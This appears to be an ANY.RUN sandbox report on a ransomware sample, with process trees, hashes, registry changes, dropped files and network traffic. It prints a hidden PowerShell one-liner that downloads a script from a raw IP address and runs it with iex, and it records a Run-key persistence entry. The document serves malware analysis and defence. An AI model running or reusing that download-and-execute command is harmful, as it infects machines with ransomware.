File name:

ed.txt

Full analysis: https://app.any.run/tasks/26635f83-0be4-4f87-ad95-79183c9dfa60
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Malware Trends Tracker     >>>
Analysis date: July 17, 2025, 05:19:16
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
ransomware
golang
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

53780C2FDDF6276E6E8A5B64FA67ABE8

SHA1:

4460B4232B3FFB8512AAFBB5FD3CCDA2C58A4B5E

SHA256:

39E34169CC482C08558FF6D7C9ED516C2DA41823B51B9BEC0F81F590161A31BA

SSDEEP:

6:PnPrCNAjicW9W3e8HNOhB8BqkWrcdR1KBM3S1zz4Q:PuCTkWOMcY0rcdR1aIS134Q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2728)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2728)

    • RANSOMWARE has been detected

      • powershell.exe (PID: 2728)

    • Executing a file with an untrusted certificate

      • trx.exe (PID: 700)
      • trx.exe (PID: 6596)
      • trx.exe (PID: 6684)

  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 2728)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1948)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1948)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1948)

    • Found IP address in command line

      • powershell.exe (PID: 2728)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2728)

    • Connects to the server without a host name

      • powershell.exe (PID: 2728)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2728)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2728)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 2728)

    • Executing commands from ".cmd" file

      • powershell.exe (PID: 2728)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2728)

    • The executable file from the user directory is run by the CMD process

      • trx.exe (PID: 700)

    • The process checks if it is being run in the virtual environment

      • explorer.exe (PID: 4836)
      • explorer.exe (PID: 3932)

    • Executes application which crashes

      • explorer.exe (PID: 4836)
      • explorer.exe (PID: 3932)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 2728)
      • slui.exe (PID: 5184)

    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 4768)

    • Manual execution by a user

      • cmd.exe (PID: 1948)
      • trx.exe (PID: 6684)
      • trx.exe (PID: 6596)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2728)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 2728)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2728)

    • Checks supported languages

      • trx.exe (PID: 700)
      • trx.exe (PID: 6596)
      • trx.exe (PID: 6684)

    • Reads the software policy settings

      • slui.exe (PID: 5184)

    • Application based on Golang

      • trx.exe (PID: 700)
      • trx.exe (PID: 6596)
      • trx.exe (PID: 6684)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
167
Monitored processes
16
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start notepad.exe no specs cmd.exe conhost.exe no specs slui.exe THREAT powershell.exe cmd.exe no specs conhost.exe no specs trx.exe no specs trx.exe no specs explorer.exe explorer.exe rundll32.exe no specs trx.exe no specs werfault.exe no specs werfault.exe no specs explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
700"C:\Users\admin\Pictures\Camera Roll\0bbuvWKx8T\trx.exe" C:\Users\admin\Pictures\Camera Roll\0bbuvWKx8T\trx.execmd.exe
User:
admin
Company:
Akeo Consulting
Integrity Level:
HIGH
Description:
Rufus
Exit code:
0
Version:
4.9.2256
Modules
Images
c:\users\admin\pictures\camera roll\0bbuvwkx8t\trx.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
1380C:\WINDOWS\SysWOW64\WerFault.exe -u -p 3932 -s 944C:\Windows\SysWOW64\WerFault.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
1632\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1948"C:\WINDOWS\system32\cmd.exe" C:\Windows\System32\cmd.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\wldp.dll
2312C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
2348\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2728powershell.exe -w hidden -nop -c "$gt='http://185.102.115.69/xPs.dof';$wks=New-Object -Com Microsoft.XMLHTTP;$wks.open('GET',$gt,$false);$wks.send();$ei=[Text.Encoding]::UTF8.GetString($wks.responseBody);iex $ei"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3196C:\WINDOWS\SysWOW64\WerFault.exe -u -p 4836 -s 1008C:\Windows\SysWOW64\WerFault.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3556C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exetrx.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
3852C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\tmp4F98.cmd" "C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
Total events
8 116
Read events
8 108
Write events
8
Delete events
0

Modification events

(PID) Process:(2728) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2728) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2728) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2728) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:hIEEhiDSCjH
Value:
C:\Users\admin\Pictures\Camera Roll\0bbuvWKx8T\trx.exe
(PID) Process:(4768) notepad.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
Operation:writeName:iWindowPosX
Value:
294
(PID) Process:(4768) notepad.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
Operation:writeName:iWindowPosY
Value:
120
(PID) Process:(4768) notepad.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
Operation:writeName:iWindowPosDX
Value:
960
(PID) Process:(4768) notepad.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
Operation:writeName:iWindowPosDY
Value:
489
Executable files
1
Suspicious files
1
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
2728powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\E4DJRUXW\xPs[1].doftext
MD5:EF3620449C6F5D01D5FC66E9FB581B40
SHA256:340C8F71781996CC10F127B11F1D169E39F296DA56297FC2C7096664B356C1D3
2728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xbk53ws2.2rx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5izit0vt.y12.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2728powershell.exeC:\Users\admin\AppData\Local\Temp\tmp4F98.cmdtext
MD5:FF68844952DDE6F1E5809D6B89B569D4
SHA256:B4AC506DDE591F7448B552726023EF46E669261E45A939DDB1A87E416E2D3488
2728powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:46429DB505F0FF15A27AE01576157D47
SHA256:62034E038BE1C0322C8DFEB14558667132FC3711CB3B3FED074D0D2EE83A1FD6
2728powershell.exeC:\Users\admin\Pictures\Camera Roll\0bbuvWKx8T\trx.exeexecutable
MD5:31B30B12835768953B28997A776D59C0
SHA256:87A825AE07C18D2E55200D110CF5108E9FAFC9B8DD22944BDDFD3AAACF598F11
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
46
DNS requests
23
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2460
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5328
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1268
svchost.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5328
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
3108
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
3108
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
2940
svchost.exe
GET
200
2.23.197.184:80
http://x1.c.lencr.org/
unknown
whitelisted
2728
powershell.exe
GET
200
185.102.115.69:80
http://185.102.115.69/xPs.dof
unknown
unknown
6772
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5944
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5968
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5328
SearchApp.exe
104.126.37.154:443
www.bing.com
Akamai International B.V.
DE
whitelisted
5328
SearchApp.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2460
svchost.exe
40.126.31.130:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2460
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
1268
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
google.com
  • 142.250.186.110
whitelisted
www.bing.com
  • 104.126.37.154
  • 104.126.37.155
  • 104.126.37.176
  • 104.126.37.153
  • 104.126.37.162
  • 104.126.37.161
  • 104.126.37.163
  • 104.126.37.171
  • 104.126.37.185
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
login.live.com
  • 40.126.31.130
  • 40.126.31.69
  • 20.190.159.71
  • 20.190.159.4
  • 20.190.159.68
  • 40.126.31.71
  • 40.126.31.131
  • 40.126.31.1
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
fp.msedge.net
  • 204.79.197.222
whitelisted
th.bing.com
  • 2.16.241.216
  • 2.16.241.205
  • 2.16.241.207
  • 2.16.241.201
  • 2.16.241.218
  • 2.16.241.222
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted

Threats

PID
Process
Class
Message
2728
powershell.exe
Misc activity
ET INFO Observed UA-CPU Header
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
ed.txt